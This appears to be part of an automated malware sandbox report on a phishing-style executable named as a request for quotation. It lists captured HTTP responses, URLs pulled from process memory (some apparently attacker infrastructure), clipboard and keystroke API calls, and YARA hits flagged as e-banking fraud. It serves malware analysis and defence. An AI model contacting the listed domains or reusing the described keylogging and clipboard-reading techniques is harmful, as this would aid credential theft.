              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: runonce.exe, 0000000F.00000002.4105089427.0000000004FE4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4104953785.0000000003934000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.3934094880.00000000031D4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu
              Source: xl9lsbb.exe, 0000000B.00000002.3205108793.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4105348256.0000000004AC5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hsck520.com
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4105348256.0000000004AC5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hsck520.com/2e2r/
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4103523467.000000000159E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmancha.com
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4103523467.000000000159E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmancha.com/3in6/
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
              Source: runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.000000000339E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.000000000339E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003380000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: RMActivate_ssp.exe, 00000003.00000003.1923274383.0000000008116000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3826100724.000000000760F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
              Source: RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://v-cn.vaptcha.com/v3.js
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/?welcome
              Source: RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/chat-with/14282961/
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EE425A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EE4458
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EE425A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00ED0219
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EFCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EFCDAC

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

